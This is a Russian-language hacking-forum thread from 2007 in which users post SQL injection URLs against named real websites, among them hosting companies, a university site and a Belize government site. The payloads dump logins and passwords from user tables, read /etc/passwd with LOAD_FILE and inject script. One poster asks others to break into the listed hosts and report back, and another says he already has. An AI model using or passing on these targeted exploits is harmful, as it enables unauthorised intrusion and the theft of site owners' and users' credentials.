ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, сейчас доступен на antichat.xyz.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #201  
Старый 02.01.2007, 13:24
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://surnet.ru/show_txt.php?id=-99+union+select+1,2,3,4,5,6,char(60,115,99,114,105 ,112,116,62,97,108,101,114,116,40,39,112,114,101,1 18,101,100,39,41,60,47,115,99,114,105,112,116,62), 8/*

UTEL - Челябинск (Южно-Уральская сеть передачи данных)
На этом же сайте и статистика и т.д.
 
Ответить с цитированием

  #202  
Старый 02.01.2007, 13:33
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.expressglobal.ru/directions/china/tours/?id=-1+union+select+null/*
Вот одна, правда толку от неё...

Последний раз редактировалось Termin@L; 02.01.2007 в 17:56..
 
Ответить с цитированием

  #203  
Старый 03.01.2007, 09:46
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://pride.uoregon.edu/section.php?id=-1+union+select+1,2,3,4,5,6/*
одна была
 
Ответить с цитированием

  #204  
Старый 03.01.2007, 12:12
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Лень самому возиться с взломом... Сам нашел все...

http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+1,user()/*
http://www.all4hosting.ru/index.asp?idSort=3&idPage=1+union+select+1,2,3--
http://www.ht-systems.ru/events/news.php?ID=4+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6/*
http://aho.ru/hosting/tarifs.php?tgroup=2+union+select+1,2,3/*
http://uptime.ru/content.php?what=preleases&id=-1+union+select+1,login,password,4,5,6,7+from+users +limit+1,3/*
http://ivanhost.ru/?p=18&a=-3+union+select+USER(),DATABASE()/*
http://order.besthost.ru/order/index.php?hmid=-1+union+select+1,2,3,4,5,6,7,LOAD_FILE('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26/*

Все - хостинги, из двух последних - один из них - реселлер valuehost'а, а второй прямо в той же базе, что и valuehost, так что не мудрено взломать и сам valuehost.ru

Последний раз редактировалось Macro; 03.01.2007 в 12:22..
 
Ответить с цитированием

  #205  
Старый 03.01.2007, 12:19
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://fotokatalog.ru/index.php?pp=25+union+select+1/*&from=50

Incorrect usage of UNION and ORDER BY
ЧТо это?
P.S. 2 Macros http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+concat(id,c har(58),user,char(58),pass,char(58,32,32,32),right s,char(58),rname,char(58),mail,char(58),char(58),e ditor)%20,concat(char(83,101,115,115,105,111,110,5 8,32),sess)+from+login/*
Супер, а у меня вчера ничего не получилось...

Последний раз редактировалось Termin@L; 03.01.2007 в 12:48..
 
Ответить с цитированием

  #206  
Старый 03.01.2007, 12:34
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от Termin@L  
http://fotokatalog.ru/index.php?pp=25+union+select+1/*&from=50

Incorrect usage of UNION and ORDER BY
ЧТо это?
Там данные из переменной pp подставляются в order by, а данные из переменной from - в limit. Так что ни хрена не получится. Он всегда тебе будет выдавать ошибку, видимо там
Код:
ORDER BY $pp LIMIT $from,25
 
Ответить с цитированием

  #207  
Старый 03.01.2007, 12:50
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
Провел на форуме:
1845062

Репутация: 1079


По умолчанию

Цитата:
Сообщение от Macro  
Лень самому возиться с взломом... Сам нашел все...

http://hoster.od.ua/hosting/hosting_faq.php?news_id=1+union+select+1,user()/*
http://www.all4hosting.ru/index.asp?idSort=3&idPage=1+union+select+1,2,3--
http://www.ht-systems.ru/events/news.php?ID=4+union+select+1,2,3,4,LOAD_FILE('/etc/passwd'),6/*
http://aho.ru/hosting/tarifs.php?tgroup=2+union+select+1,2,3/*
http://uptime.ru/content.php?what=preleases&id=-1+union+select+1,login,password,4,5,6,7+from+users +limit+1,3/*
http://ivanhost.ru/?p=18&a=-3+union+select+USER(),DATABASE()/*
http://order.besthost.ru/order/index.php?hmid=-1+union+select+1,2,3,4,5,6,7,LOAD_FILE('/etc/passwd'),9,10,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26/*

Все - хостинги, из двух последних - один из них - реселлер valuehost'а, а второй прямо в той же базе, что и valuehost, так что не мудрено взломать и сам valuehost.ru
Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку
 
Ответить с цитированием

  #208  
Старый 03.01.2007, 17:09
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

Всех с 2007-мым годом и Скуль на allpeople.ru

http://www.allpeople.ru/chital.php?read=-2+union+select+1,2,3,4,concat(login,char(3),pas),D ATABASE(),7,8,9,10+from+people+where+id=[Нужный вам id]/*
 
Ответить с цитированием

  #209  
Старый 03.01.2007, 17:52
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Macro  
Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку
http://hoster.od.ua
http://uptime.ru
http://www.ht-systems.ru
- баян =\
Давно хекал =\
"Если кто-нибудь что-нибудь из этого взломает - отпишитесь пожалуйста, хоть в личку " - для чего?
 
Ответить с цитированием

  #210  
Старый 03.01.2007, 20:26
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.belize.gov.bz/doc_center_directory_listings.php?folder_id=-99+union+select+1,2,concat(username,0x3a,password) ,4+from+users+limit+0,1/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ